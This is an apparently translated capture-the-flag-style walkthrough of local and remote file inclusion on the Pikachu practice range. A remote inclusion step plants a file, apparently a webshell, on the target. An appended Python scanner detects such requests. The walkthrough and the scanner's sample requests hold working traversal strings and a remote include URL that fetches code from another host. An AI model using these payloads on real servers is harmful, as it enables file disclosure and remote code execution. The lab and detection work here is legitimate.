Using the Pikachu range as an example:
1- Local file inclusion vulnerabilities
Using "../" to jump between directories, files in another directory can be read.
For example, on Windows: ../../../../Windows/System32/drivers/etc/hosts
Demo: first, the normal link.
We change the link information.
The local hosts file information is displayed: success.
2- Remote file inclusion practical demo:
Using the Pikachu range as an example:
Attacked server: 192.168.36.129
Server holding the remote code file: 192.168.36.131
Attacker: local browser
Tip: look through the range to find the relevant server path.
Then write a file, yijuhua.txt, on the remote server.
It reads as follows:
Open Burp in advance, then select the information in the range and click submit query.
Burp captures the packet; modify the information.
Then forward it.
Next, check the attacked server. We find
one more file, yijuhua.php: the upload succeeded. Then verify:
Success.
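
Added example (not part of the original post): a log-side check for the two request shapes demonstrated above, "../" traversal and a remote URL passed as the include parameter. It normalizes nested URL-encoding before matching. The request path /include.php and the parameter name filename are hypothetical, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Traversal in either slash style: ../ or ..\
TRAVERSAL = re.compile(r"\.\.[/\\]")
# A parameter value that begins with a URL scheme or stream wrapper
REMOTE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding (%252e -> %2e -> .) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(url):
    """Return a sorted list of findings for one request URL."""
    findings = set()
    query = urlsplit(url).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).strip()
        if TRAVERSAL.search(value):
            findings.add(f"traversal:{name}")
        if REMOTE.match(value):
            findings.add(f"remote-include:{name}")
    return sorted(findings)


def scan(requests):
    """Map each suspicious request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := classify_request(r))}


# Constructed sample requests; path and parameter name are hypothetical.
SAMPLE_REQUESTS = [
    "/include.php?filename=file1.php&submit=go",
    "/include.php?filename=../../../../Windows/System32/drivers/etc/hosts",
    "/include.php?filename=%252e%252e%255c%252e%252e%255cWindows%255cSystem32"
    "%255cdrivers%255cetc%255chosts",
    "/include.php?filename=http://192.168.36.131/yijuhua.txt&submit=go",
]

if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, request)
```

On the server side, the same two patterns are closed off by mapping the parameter to a fixed allowlist of include files and keeping PHP's allow_url_include disabled.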